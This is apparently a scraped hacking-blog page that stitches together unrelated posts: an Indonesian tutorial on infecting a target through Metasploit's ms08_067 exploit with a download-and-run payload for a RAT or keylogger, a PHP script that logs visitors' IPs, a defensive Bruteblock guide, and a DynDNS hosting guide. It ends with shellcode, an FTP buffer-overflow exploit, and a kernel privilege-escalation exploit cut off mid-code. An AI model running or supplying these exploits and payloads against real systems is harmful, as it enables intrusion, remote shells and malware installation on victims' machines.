waduh baru kaku juga tangan ne ga nulis...sekarang bakal update lagi ne o2nri2nya,,,ok lanjut...
ni tutorial ngebahas tentang gimana cara nya kita nginfect ip seseorang lewat metasploit jadi dengan gitu kita memasang program , virus,worm,RAT,keylogger atau apa aja terserah anda,
ok lanjut
di sini kita membutuhkan dua tool yg mungkin kalian semua udah pada g asing lagi lah ama tool ini
yaitu
METASPLOIT
NMAP
hal yg paling pertama kita lakukan tentu saja mencari target
yah kalo target nya dalam jaringan lokal kalian bisa menggunakan berbagai tool ip scanner kan itu sih gampang, ,,
nah kalo pngen tau ip orang di internet gimana ?
nih cuman ngasih pencerahan dikit
kita bkin dlu suatu script php untuk menangkap ip adress dari pengunjung yg membuka script itu
nih script nya
Code:
<? $file = "ip.txt"; $ip = $_SERVER['REMOTE_ADDR']; $handle = fopen($file, 'a'); fwrite($handle, "IP Address: "); fwrite($handle, "$ip"); fwrite($handle, "\n"); fclose($handle); ?>
ok lanjut kalo dah dapet ip kita lanjut buka metasploit
1. sebelum nya kita harus membuat dulu database dengan cara
ketik db_create pada metasploit
2. lalu kta scan ip target menggunakan nmap dengan cara ketik nmap pada metasploit lalu ketik nmap -sT -sV target ip
telah scanning beres nanti kita akan mendapatkan beberapa informasi, bila di dalam nya ada informasi berkaitan dengan windows 2000,(xp sp1,sp2,sp3) berarti kita bisa menginfect ip tersebut tanpa masalah
3. dalam metasploit ketik use windows/smb/ms08_067_netapi
lalu ketik 'set target 0'
'show payloads'
'set payload windows/download_exec'
show options
set RHOST target IP
nah setelah itu disini bagian terpenting nya program apa yg ingin kita infect ke ip(komputer) tersebut.
apa kah kita akan menginfeksikan suatu virus,worm,RAT,keylogger,atau apa saja terserah anda
kita ketik set url http://www.site.com/xxx.exe
dan akhir nya kita ketik exploit
4
komentar
Serangan bruteforce ke service ssh dan ftp memang bikin gondok. Hasil iseng ngebrowse membawa gw ketemu tools yang menarik dan lumayan mudah penggunaannya
Bruteblock membuat sistem administrator untuk ngebloking serangan bruteforce yang mengarah ke service UNIX .
How this tools work ?
Dengan menganalisa sistem log kemudian menambahkan alamat IP penyerang ke ipfw2 tabel, tool ini dapat memblokir brute attacker.
Kemudian alamat IP secara otomatis akan didelete dari tabel tadi setelah kurun waktu tertentu yang udah ditetapin. Bruteblock juga memakai ekspresi reguler untuk parse log, yang memberikan fleksibilitas dalam mengoperasikannya. Sehingga tool ini bisa digunakan untuk hampir semua service jaringan.
How to install ? Just simple…follow this step
1. install melalui port :
#cd /usr/ports/security/bruteblock
#make install clean
2. Tambahkan baris berikut di /etc/rc.conf agar bruteblock bisa langsung running sewaktu boot
bruteblockd_enable=”YES”
bruteblockd_table=”1″
bruteblockd_flags=”-s 5″
3. Edit file /etc/syslog.conf
Ubah baris berikut :
auth.info;authpriv.info /var/log/auth.log
menjadi
auth.info;authpriv.info |exec /usr/local/sbin/bruteblock -f /usr/local/etc/bruteblock/ssh.conf
4. Restart Syslogd
#/etc/rc.d/syslogd restart
5. start aplikasi bruteblock dengan command :
#/usr/local/etc/rc.d/bruteblockd.sh start
6. Tambain setting di ipfw untuk memblock IP-IP yang di masukkan oleh bruteblock
#ipfw add 400 deny ip from me to table\(1\)
#ipfw add 410 deny ip from table\(1\) to me
7. kalo ente mau ngerubah setting bruteblock untuk setiap service yang dilindungi, misal gw kepengen ngubah setting untuk ssh di file /usr/local/etc/bruteblock/ssh.conf
perhatikan beberapa point – point di bawah ini
regexp = sshd.*Illegal user \S+ from (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})
regexp1 = sshd.*Failed password for (?:illegal user )?\S+ from (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})
# Number of failed login attempts within time before we block
max_count = 4
# Time in seconds in which all failed login attempts must occur
within_time = 60
# Time in seconds to block ip in firewall
# 10 minutes
reset_ip = 600# IPFW table number to add “bad” hosts
ipfw2_table_no = 1
lo bisa aja menerapkan untuk service yang lain , contohnya ftp. kita hanya perlu mengubah di bagianregexp.tinggal di disesuaikan aja dengan format log servicenya.
gampang kan ?…
di tunggu commentnya di mari ..
DOWNLOAD
http://zeestuff.wordpress.com/2010/11/06/tangkis-serangan-bruteforce-pada-freebsd-unix/#more-74
source : tecon-crew
Wireless security auditing application
This is a wireless security auditing application that is written in python and uses python-qt4. This application uses the aircrack-ng suite of tools.
It should work on any version of linux running the following:
Requirements:
python
python-qt4
macchanger
aircrack-ng
xterm
For Slax Distributions, download the zipped module package on the download section, and follow the instructions in the "README" file.
To install simply run the following command in terminal after changing directory to the path were the downloaded package is:
dpkg -i Fern-Wifi-Cracker_1.1_all.deb
Software Icon can be found at the application Menu of the GNOME desktop interfaces
Icon can also be found at /usr/share/applications for KDE and also GNOME:
There you find "Fern_Wifi_Cracker.desktop"
Images:
Click the refresh button to display monitor interfaces:
Decrypted keys are automatically added to the database after a successful attack.. but you could also add the keys manually
The database file could be found at /usr/local/bin/Fern-Wifi-Cracker/key-Database/Database.db
NOTE: Its normal for your VGA screen to adjust and return while application is initializing.. this is because the software has to adjust to a suitable resolution before running... If not the text on the application overlaps or certain text becomes invisible
everyone..welcome back with me...marvellous a.k.a Liyan oz
Probably some may be already knowing this ,but many dont... so this tutorial is for the second lot of the people ie for those who don't know how to use their own personal desktop machine to host an website which can be accessed from anywhere round the world.
Been using it since around a month now and thought y not share it over here ;) ..
I learnt this method from a friend who has nothing to do with HF and have made the complete tutorials myself which took me hell lot of a time.. and so no part of this tutorial has been leeched from anyone and noone can say thats its theirs just because they use this method themself ... .. cos 10000 of people round the globe are using it. Am just trying to help the newbies and if i make any kind of error dont flame me
Requirements:
To start off u'll just require a PC with windows loaded in it. Pretty much works on all windows version :) ..
Nothing more would be required :D
Step 1 :
Goto DynDNS. Click on Sign In.
It should look something like this:
http://img203.imageshack.us/img203/1637/89403494.png
<hr>
Step 2 :
Then Click on Create an Account. You should be redirected to the registration page which looks like this:
http://img263.imageshack.us/img263/572/18892149.png
Fill in all the necessary details as required.After filling the page would look somethin like this:
http://img135.imageshack.us/img135/5926/46115337.png
Then click on Create Account and you should be redirected to page showing that account is created which looks like this :
http://img41.imageshack.us/img41/7326/92990336.png
<hr>
Step 3 :
Goto the email id which you provided during the registration. In my case the email went to the spam box .
Open the email and goto the mail from dyndns.
It looks something like this
http://img8.imageshack.us/img8/3893/66820418.png
Click on the confirmation link. On clicking it you would be redirected to dydns site where it asks for password confirmation. Enter your password which you entered during registration and you will be shown a page that states account activated.
http://img28.imageshack.us/img28/6110/28900678.png
http://img828.imageshack.us/img828/388/97742084.png
<hr>
Step 4 :
Click on Add Hostname.
This takes you to next page.
Enter any hostname of your choice and enter your current machine's Ip adress in the specified slot.
After filling it should look something like this :
http://img153.imageshack.us/img153/6231/75921400.png
Now click on Add to cart at the bottom of the page.
This take you to a page : http://img135.imageshack.us/img135/2263/63344696.png
Click Next
It takes you to a price summary page which looks like
http://img189.imageshack.us/img189/5227/30244360.png
Click Activate services on the page which take you to this page:
http://img715.imageshack.us/img715/6793/28850505.png
<hr>
Step 5 :
Now click on support on the top of the page and then on update client on the left hand side.
This takes you to this page: http://img715.imageshack.us/img715/3523/78946032.png
Now download the DyDNS Updater on to you local machine.
http://img840.imageshack.us/img840/7889/46189333.png
<hr>
Step 6 :
Now time for Installation
When you open the installer file it looks something like this: -------image 16
Go on Clicking Next ... http://img812.imageshack.us/img812/3707/63194612.png
When installation ends, you get this: http://img222.imageshack.us/img222/4535/82718638.png
Click Finish.
When it opens, you see this : http://img263.imageshack.us/img263/5320/18043052.png
Select the DNS host which we created sometime back and Click Apply and then Click Ok .
On clicking Ok... you can see this : http://img401.imageshack.us/img401/2807/54145072.png
Coool... so ur Ip is in sync with the hostname
<hr>
Step 7 :
Now my machine does not have Apache server installed.. so i'll goto http://httpd.apache.org
The page looks something like this: http://img256.imageshack.us/img256/6906/18788668.png
Now click on "from a mirror" link on the left hand side. This takes you to the downloads section which looks like :
http://img827.imageshack.us/img827/7315/45156565.png
Now you can either choose the latest version available or the most stable version thats available in the downloads section.
I'll choose the most stable version ie 2.2.17.
So, click on the Win32 Binary including OpenSSL and download it .
<hr>
Step 8 :
Then, launch the Apache Installation. The main screen when you open download is as : http://img222.imageshack.us/img222/547/92653498.png
When you click on next you get a screen like :http://img189.imageshack.us/img189/1231/42707644.png which asks you for some details.
The details have to be filled in the way last tym we had enterd for dyndns. Enter your email id for admin email id.
The filled details will look like this : http://img404.imageshack.us/img404/9084/34613609.png
Click next . Then you get this screen http://img148.imageshack.us/img148/3688/76736775.png.
Click Finish.
At this point i want to say somethin .. your DONEE doing all the required settings. Yipee
<hr>
Step 9 :
Now, to test whether what all the settings are proper and we can view our local website on the WWW , we open our browser and enter the host adress of the dyndns which we setup earlier.
Its looks something like this.
http://img525.imageshack.us/img525/8392/91348770.png
And it sayss.... It works !! .... woww....
Means we are done setting up our website using our local PC and this website can be viewed fro any place round the world .
LolZZ.. and for the others who feel that this is fake and am just viewing it cos its hosted on my local machine and am accessing it by localhost, lets use any online proxy site and visit the link to see if we can view the website.
I choose our own.. hidemyass.com ... The homepage looks like this :http://img151.imageshack.us/img151/2456/66840544.png
When i open the pre specified URL in the online proxy , the site is visited via an IP diffrent from ours ie similar to a way a diffrent machine may view the URL .. and what we see is ... http://img528.imageshack.us/img528/6531/48179935.png ... meanss... OUR HARD WORK PAYED OFF AND OUR WEBSITE IS HOSTED ONLINE AND THAT TOO FREE O COST FOR UNLIMITED PERIOD OF TIME
<hr>
Step 10 :
To others who are new to this and don't know, where to put the files so at host the website, put your own "index" page and the other files at the location : C:\Program Files\Apache Software Foundation\Apache2.2\htdocs ... just replace the index file and you can view the new site which you will be uploading. The place you upload your new index file and the other files looks like this.. http://img822.imageshack.us/img822/4714/66616122.png
<hr>
<hr>
It took me lott of time to create this tutorial specially to setup the whole thing again and take screenshots of the whole thing. So, Haters pleaseee :hi:stay off ...
Hope this tutorial was helpful for u'll ... Kindly comment and let me know whether you like it or not.
==========================================
OSX/Intel - setuid shell x86_64 - 51 bytes
==========================================
/*
* Title: OSX/Intel - setuid shell x86_64 - 51 bytes
* Date: 2010-11-25
* Tested on: Mac OS X 10.6.5 - Darwin Kernel Version 10.5.0
* Author: Dustin Schultz - twitter: @thexploit
*
* http://thexploit.com
*
* BITS 64
*
* section .text
* global start
*
* start:
* a:
* mov r8b, 0x02 ; Unix class system calls = 2
* shl r8, 24 ; shift left 24 to the upper order bits
* or r8, 0x17 ; setuid = 23, or with class = 0x2000017
* xor edi, edi ; zero out edi
* mov rax, r8 ; syscall number in rax
* syscall ; invoke kernel
* jmp short c ; jump to c
* b:
* pop rdi ; pop ret addr which = addr of /bin/sh
* add r8, 0x24 ; execve = 59, 0x24+r8=0x200003b
* mov rax, r8 ; syscall number in rax
* xor rdx, rdx ; zero out rdx
* push rdx ; null terminate rdi, pushed backwards
* push rdi ; push rdi = pointer to /bin/sh
* mov rsi, rsp ; pointer to null terminated /bin/sh string
* syscall ; invoke the kernel
* c:
* call b ; call b, push ret of /bin/sh
* db '/bin//sh' ; /bin/sh string
*/
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*sc)();
char shellcode[] =
"\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17\x31\xff\x4c\x89\xc0"
"\x0f\x05\xeb\x12\x5f\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x52"
"\x57\x48\x89\xe6\x0f\x05\xe8\xe9\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x2f\x73\x68";
int main(int argc, char **argv) {
void *ptr = mmap(0, 0x33, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON
| MAP_PRIVATE, -1, 0);
if (ptr == MAP_FAILED) {
perror("mmap");
exit(-1);
}
memcpy(ptr, shellcode, sizeof(shellcode));
sc = ptr;
sc();
return 0;
}
# oz==============================================
linux/ARM - Bind Connect UDP Port 68 Shellcode
==============================================
/*
* Title: arm-bind-connect-udp
* Brief: Bind to port 68 on any local address and plug a udp shell
* onto to port 67 on 192.168.0.1
* Author: Daniel Godas-Lopez <gmail account dgodas>
*/
.if 1
/*
close(3), close(4), ..., close(1024)
*/
mov %r1, $1024
1: mov %r0, %r1
svc 0x00900006
subs %r1, %r1, $1
subs %r2, %r1, $3
bpl 1b
.endif
/*
soc_des = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
*/
mov %r0, $2 /* AF_INET */
mov %r1, $2 /* SOCK_DGRAM */
mov %r2, $17 /* IPPRTOTO_UDP */
push {%r0, %r1, %r2}
mov %r0, $1 /* socket */
mov %r1, %sp
svc 0x00900066
add %sp, %sp, $12
mov %r6, %r0 /* r6 = soc_des */
/*
bind(soc_des, (struct sockaddr*) &serv_addr, sizeof(serv_addr));
*/
.if 0 /* r0 == r6 already */
mov %r0, %r6 /* soc_des */
.endif
mov %r1, $0x44000000
add %r1, $2 /* port = 68, family = 2 (AF_INET) */
sub %r2, %r2, %r2 /* addr = 0.0.0.0 */
push {%r1, %r2}
mov %r1, %sp /* pointer to sockaddr_in */
mov %r2, $16 /* sizeof(struct sockaddr_in) */
push {%r0, %r1, %r2}
mov %r0, $2 /* bind */
mov %r1, %sp
svc 0x00900066
add %sp, %sp, $20
/*
connect(soc_des, (struct sockaddr*) &cli_addr, sizeof(cli_addr));
*/
mov %r0, %r6 /* soc_des */
mov %r1, $0x43000000
add %r1, $2 /* port = 67, family = 2 (AF_INET) */
mov %r2, $0x1000000
add %r2, %r2, $0xa800
add %r2, $0xc0 /* addr = 192.168.0.1 */
push {%r1, %r2}
mov %r1, %sp /* pointer to sockaddr_in */
mov %r2, $16 /* sizeof(struct sockaddr_in) */
push {%r0, %r1, %r2}
mov %r0, $3 /* connect */
mov %r1, %sp
svc 0x00900066
add %sp, %sp, $20
/*
dup2(soc_cli,0);
dup2(soc_cli,1);
dup2(soc_cli,2);
*/
mov %r1, $2
1: mov %r0, %r6
svc 0x0090003f
subs %r1, %r1, $1
bpl 1b
/*
execve("/bin/sh", parms, env);
*/
sub %r1, %sp, $4 /* argv[0] = "sh" */
sub %r2, %r2, %r2 /* argv[1] = 0x00000000 */
mov %r3, $0x2f
mov %r7, $0x62
add %r3, %r7, lsl $8
mov %r7, $0x69
add %r3, %r7, lsl $16
mov %r7, $0x6e
add %r3, %r7, lsl $24 /* '/' 'b' 'i' 'n' */
mov %r4, $'/'
mov %r7, $'s'
add %r4, %r7, lsl $8
mov %r7, $'h'
add %r4, %r7, lsl $16 /* '/' 's' 'h' 0x00 */
mov %r5, $'s'
mov %r7, $'h'
add %r5, %r7, lsl $8 /* 's' 'h' 0x00 0x00 */
push {%r1, %r2, %r3, %r4, %r5}
add %r0, %sp, $8 /* filename ptr */
add %r1, %sp, $0 /* argv ptr */
add %r2, %sp, $4 /* env ptr */
svc 0x0090000b
# oz=======================================================
Freefloat FTP Server Buffer Overflow Vulnerability 0day
=======================================================
# Exploit Title: Freefloat FTP Server Buffer Overflow Vulnerability
# Date: 12/05/2010
# Author: 0v3r
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Tested on: Windows XP SP3 EN
# CVE: N/A
#!/usr/bin/python
import socket
import sys
def usage():
print "usage : ./freefloatftp.py <victim_ip> <victim_port>"
print "example: ./freefloatftp.py 192.168.1.100 21"
#Bind Shell shellcode port 4444
shellcode = ("\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
"\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c"
"\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x07"
"\x0b\x51\x43\x9c\x79\x7e\x64\x15\x37\x58\x4b\xa6\xf6\x64\x07"
"\x64\x99\x18\x5a\xb9\x79\x20\x95\xcc\x78\x65\xc8\x3f\x28\x3e"
"\x86\x92\xdc\x4b\xda\x2e\xdd\x9b\x50\x0e\xa5\x9e\xa7\xfb\x1f"
"\xa0\xf7\x54\x14\xea\xef\xdf\x72\xcb\x0e\x33\x61\x37\x58\x38"
"\x51\xc3\x5b\xe8\xa8\x2c\x6a\xd4\x66\x13\x42\xd9\x77\x53\x65"
"\x02\x02\xaf\x95\xbf\x14\x74\xe7\x1b\x91\x69\x4f\xef\x01\x4a"
"\x71\x3c\xd7\x19\x7d\x89\x9c\x46\x62\x0c\x71\xfd\x9e\x85\x74"
"\xd2\x16\xdd\x52\xf6\x73\x85\xfb\xaf\xd9\x68\x04\xaf\x86\xd5"
"\xa0\xbb\x25\x01\xd2\xe1\x21\xe6\xe8\x19\xb2\x60\x7b\x69\x80"
"\x2f\xd7\xe5\xa8\xb8\xf1\xf2\xcf\x92\x45\x6c\x2e\x1d\xb5\xa4"
"\xf5\x49\xe5\xde\xdc\xf1\x6e\x1f\xe0\x27\x20\x4f\x4e\x98\x80"
"\x3f\x2e\x48\x68\x2a\xa1\xb7\x88\x55\x6b\xce\x8f\x9b\x4f\x82"
"\x67\xde\x6f\x34\x2b\x57\x89\x5c\xc3\x31\x01\xc9\x21\x66\x9a"
"\x6e\x5a\x4c\xb6\x27\xcc\xd8\xd0\xf0\xf3\xd8\xf6\x52\x58\x70"
"\x91\x20\xb2\x45\x80\x36\x9f\xed\xcb\x0e\x77\x67\xa2\xdd\xe6"
"\x78\xef\xb6\x8b\xeb\x74\x47\xc2\x17\x23\x10\x83\xe6\x3a\xf4"
"\x39\x50\x95\xeb\xc0\x04\xde\xa8\x1e\xf5\xe1\x31\xd3\x41\xc6"
"\x21\x2d\x49\x42\x16\xe1\x1c\x1c\xc0\x47\xf7\xee\xba\x11\xa4"
"\xb8\x2a\xe4\x86\x7a\x2d\xe9\xc2\x0c\xd1\x5b\xbb\x48\xed\x53"
"\x2b\x5d\x96\x8e\xcb\xa2\x4d\x0b\xfb\xe8\xcc\x3d\x94\xb4\x84"
"\x7c\xf9\x46\x73\x42\x04\xc5\x76\x3a\xf3\xd5\xf2\x3f\xbf\x51"
"\xee\x4d\xd0\x37\x10\xe2\xd1\x1d\x1a")
junk1 = "\x41" * 230
eip = "\x53\x93\x42\x7E" #7E429353 JMP ESP
nops = "\x90" * 16
junk2 = "\x43" * (1000 - len(junk1 + eip + nops + shellcode))
buff = junk1 + eip + nops + shellcode + junk2
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "\n"
print "----------------------------------------------------------------"
print "| Freefloat FTP Server Buffer Overflow Vulnerability |"
print "----------------------------------------------------------------"
print "\n"
if len(sys.argv) != 3:
usage()
sys.exit()
ip = sys.argv[1]
port = sys.argv[2]
try:
print("[-] Connecting to " + ip + " on port " + port + "\n")
s.connect((ip,int(port)))
data = s.recv(1024)
print("[-] Sending exploit...")
s.send('USER ' + buff + '\r\n')
s.close()
print("[-] Exploit successfully sent...")
print("[-] Connect to " + ip + " on port 4444")
except:
print("[-] Connection error...")
print("[-] Check if victim is up.")
===================================================
Freefloat FTP Server Buffer Overflow Exploit (Meta)
===================================================
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'Freefloat FTP <= 1.00 Stack Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability in Freefloat FTP service version 1.00.
This module uses the USER command to trigger the overflow.
},
'Author' =>
[
'0v3r', # original version
'Muhamad Fadzil Ramli' # metasploit module
],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'EDB', '15689' ],
[ 'URL', 'http://www.freefloat.com/software/freefloatftpserver.zip' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'RPORT' => 21
},
'Privileged' => false,
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x00\x0a\x0d\xff\x20",
'StackAdjustment' => -3500,
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP3 (EN)', { 'Ret' => 0x5AD86AEB } ], # push esp, ret [uxtheme.dll]
],
'DisclosureDate' => 'December 5 2010',
'DefaultTarget' => 0))
deregister_options('FTPUSER','FTPPASS')
end
def check
connect
disconnect
if (banner =~ /FreeFloat Ftp Server \(Version 1\.00\)/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
print_status("Trying target #{target.name}...")
buf = rand_text_alpha(230)
buf << [target.ret].pack('V')
buf << make_nops(16)
buf << payload.encoded
#buf << rand_text_alpha(1000 - buf.length)
#send_cmd( ['USER',buf],false )
send_user(buf)
handler
disconnect
end
end====================================================================
ViRobot Desktop 5.5 and Server 3.5 <=2008.8.1.1 Privilege Escalation
====================================================================
VULNERABLE PRODUCTS
Hauri ViRobot Desktop 5.5 and below
Hauri ViRobot Server 3.5 and below
DETAILS:
VRsecos.sys create a device called "VRsecos" , and handles DeviceIoControl Code = 0x8307202c , which use the function "strcpy" to copy memory from irp systembuffer to driver's data area , can be overwrite critical kernel object memory in vrsecos.sys ' s data area
EXPLOIT CODE: (Test On Windows XP SP3 , only for vrsecos.sys == 2008.8.1.1)
\
// virobot0day.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include "windows.h"
#include "malloc.h"
typedef struct X_DISPATCHER_HEADER{
UCHAR Type ;
UCHAR Absolute ;
UCHAR Size ;
UCHAR Inserted ;
ULONG SignalState ;
LIST_ENTRY WaitListHead ;
}X_DISPATCHER_HEADER , *PX_DISPATCHER_HEADER;
typedef struct X_KMUTANT{
X_DISPATCHER_HEADER Header ;
LIST_ENTRY MutantListEntry ;
PVOID OwnerThread ;
UCHAR Abandoned ;
UCHAR ApcDisable ;
}X_KMUTANT , *PX_KMUTANT;
PVOID GetInfoTable(ULONG ATableType)
{
ULONG mSize = 0x4000;
PVOID mPtr = NULL;
LONG status;
HMODULE hlib = GetModuleHandle("ntdll.dll");
PVOID pZwQuerySystemInformation = GetProcAddress(hlib , "ZwQuerySystemInformation");
do
{
mPtr = malloc(mSize);
if (mPtr)
{
__asm
{
push 0
push mSize
push mPtr
push ATableType
call pZwQuerySystemInformation
mov status , eax
}
}
else
{
return NULL;
}
if (status == 0xc0000004)
{
free(mPtr);
mSize = mSize * 2;
}
} while (status == 0xc0000004);
if (status == 0)
{
return mPtr;
}
free(mPtr);
return NULL;
}
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
USHORT UniqueProcessId;
USHORT CreatorBackTraceIndex;
UCHAR ObjectTypeIndex;
UCHAR HandleAttributes;
USHORT HandleValue;
PVOID Object;
ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
typedef struct _SYSTEM_HANDLE_INFORMATION {
ULONG NumberOfHandles;
SYSTEM_HANDLE_TABLE_ENTRY_INFO Information[ 1 ];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
enum { SystemModuleInformation = 11,
SystemHandleInformation = 16 };
typedef struct {
ULONG Unknown1;
ULONG Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef VOID (WINAPI *PINBV_ACQUIRE_DISPLAY_OWNERSHIP)(VOID);
typedef BOOLEAN (WINAPI *PINBV_RESET_DISPLAY)(VOID);
typedef VOID (WINAPI *PINBV_SOLID_COLOR_FILL)(
ULONG x1,
ULONG y1,
ULONG x2,
ULONG y2,
ULONG color
);
typedef ULONG (WINAPI *PINBV_SET_TEXT_COLOR)(
ULONG Color
);
typedef
VOID
(*INBV_DISPLAY_STRING_FILTER)(
PUCHAR *Str
);
typedef VOID (WINAPI *PINBV_INSTALL_DISPLAY_STRING_FILTER)(
INBV_DISPLAY_STRING_FILTER DisplayStringFilter
);
typedef BOOLEAN (WINAPI *PINBV_ENABLE_DISPLAY_STRING)(
BOOLEAN bEnable
);
typedef VOID (WINAPI *PINVB_SET_SCROLL_REGION)(
ULONG x1,
ULONG y1,
ULONG x2,
ULONG y2
);
typedef VOID (WINAPI *PINBV_DISPLAY_STRING)(
PUCHAR Str
);
PINBV_ACQUIRE_DISPLAY_OWNERSHIP InbvAcquireDisplayOwnership = 0 ;
PINBV_RESET_DISPLAY InbvResetDisplay = 0 ;
PINBV_SOLID_COLOR_FILL InbvSolidColorFill = 0 ;
PINBV_SET_TEXT_COLOR InbvSetTextColor = 0 ;
PINBV_INSTALL_DISPLAY_STRING_FILTER InbvInstallDisplayStringFilter = 0 ;
PINBV_ENABLE_DISPLAY_STRING InbvEnableDisplayString = 0 ;
PINVB_SET_SCROLL_REGION InbvSetScrollRegion = 0 ;
PINBV_DISPLAY_STRING InbvDisplayString= 0 ;
#define VGA_COLOR_BLACK 0
#define VGA_COLOR_RED 1
#define VGA_COLOR_GREEN 2
#define VGA_COLOR_GR 3
#define VGA_COLOR_BULE 4
#define VGA_COLOR_DARK_MEGAENTA 5
#define VGA_COLOR_TURQUOISE 6
#define VGA_COLOR_GRAY 7
#define VGA_COLOR_BRIGHT_GRAY 8
#define VGA_COLOR_BRIGHT_RED 9
#define VGA_COLOR_BRIGHT_GREEN 10
#define VGA_COLOR_BRIGHT_YELLOW 11
#define VGA_COLOR_BRIGHT_BULE 12
#define VGA_COLOR_BRIGHT_PURPLE 13
#define VGA_COLOR_BRIGHT_TURQUOISE 14
#define VGA_COLOR_WHITE 15
UCHAR DisplayString[] =
" "
" "
" "
" ---- ===== EXPLOIT SUCCESSFULLY ==== ---- "
" "
" "
" ViRobot Desktop 5.5 & ViRobot Server 3.5 Local Privilege Escalation Exploit "
" "
" VULNERABLE PRODUCT "
" "
" ViRobot Desktop 5.5 and below "
" ViRobot Server 3.5 and below "
" "
" VULERABLE FILE "
" VRsecos.sys <= 2008.8.1.1 "
" "
" AUTHOR "
" "
" MJ0011 "
" th_decoder$126.com "
" "
" 2010-8-22 "
" "
" "
" ";
VOID InbvShellCode()
{
//DISABLE INTERRUPT
__asm
{
cli
}
//RESET TO VGA MODE
InbvAcquireDisplayOwnership();
InbvResetDisplay();
//FILL FULL SCREEN
InbvSolidColorFill(0 , 0 , 639 , 479 ,VGA_COLOR_BLACK);
//SET TEXT COLOR
InbvSetTextColor(VGA_COLOR_BRIGHT_GREEN);
InbvInstallDisplayStringFilter(NULL);
InbvEnableDisplayString(TRUE);
InbvSetScrollRegion( 0 , 0 , 639 ,477);
InbvDisplayString(DisplayString);
while(TRUE)
{
};
}
BOOL InbvInit(PVOID ntosbase , PSTR ntosname)
{
HMODULE hlib = LoadLibrary(ntosname);
if (hlib == NULL)
{
return FALSE ;
}
InbvAcquireDisplayOwnership = (PINBV_ACQUIRE_DISPLAY_OWNERSHIP)((ULONG)GetProcAddress(hlib , "InbvAcquireDisplayOwnership") - (ULONG)hlib + (ULONG)ntosbase);
InbvResetDisplay = (PINBV_RESET_DISPLAY)((ULONG)GetProcAddress(hlib , "InbvResetDisplay") - (ULONG)hlib + (ULONG)ntosbase);
InbvSolidColorFill = (PINBV_SOLID_COLOR_FILL)((ULONG)GetProcAddress(hlib , "InbvSolidColorFill") - (ULONG)hlib + (ULONG)ntosbase);
InbvSetTextColor = (PINBV_SET_TEXT_COLOR)((ULONG)GetProcAddress(hlib , "InbvSetTextColor") - (ULONG)hlib + (ULONG)ntosbase);
InbvInstallDisplayStringFilter = (PINBV_INSTALL_DISPLAY_STRING_FILTER)((ULONG)GetProcAddress(hlib , "InbvInstallDisplayStringFilter") - (ULONG)hlib + (ULONG)ntosbase);
InbvEnableDisplayString = (PINBV_ENABLE_DISPLAY_STRING)((ULONG)GetProcAddress(hlib , "InbvEnableDisplayString") - (ULONG)hlib + (ULONG)ntosbase);
InbvSetScrollRegion = (PINVB_SET_SCROLL_REGION)((ULONG)GetProcAddress(hlib , "InbvSetScrollRegion") - (ULONG)hlib + (ULONG)ntosbase);
InbvDisplayString = (PINBV_DISPLAY_STRING)((ULONG)GetProcAddress(hlib , "InbvDisplayString") - (ULONG)hlib + (ULONG)ntosbase);
if (InbvAcquireDisplayOwnership &&
InbvResetDisplay &&
InbvSolidColorFill &&
InbvSetTextColor &&
InbvInstallDisplayStringFilter &&
InbvEnableDisplayString &&
InbvSetScrollRegion &&
InbvDisplayString)
{
return TRUE ;
}
return FALSE ;
}
int main(int argc, char* argv[])
{
printf("ViRotbot Desktop 5.5 & ViRobot Server 3.5 vrsecos.sys <= 2008.8.1.1\n"
"Local Kernel Mode Privilege Escalation Vulnerability POC\n\n"
"This Exploit Code Only for vrsecos == 2008.8.1.1\n"
"Test On Windows XP SP3\n\n"
"By MJ0011 th_decoder$126.com\n\n"
"Press Enter\n");
getchar();
HANDLE hDev = CreateFile("\\\\.\\VRsecos" , FILE_READ_ATTRIBUTES , FILE_SHARE_READ , 0 , OPEN_EXISTING , 0 , 0 );
if (hDev == INVALID_HANDLE_VALUE)
{
printf("cannot open device....%u\n" , GetLastError());
//return 0;
}
//data for IoControlCode = 8307202C , buffer overrun
PVOID pdata = malloc(0x2000);
//fill non-zero data
memset(pdata , 0x20 , 0x2000);
//process mutx ...
PX_KMUTANT pmutant = (PX_KMUTANT)((ULONG)pdata + 0x858 + 200);
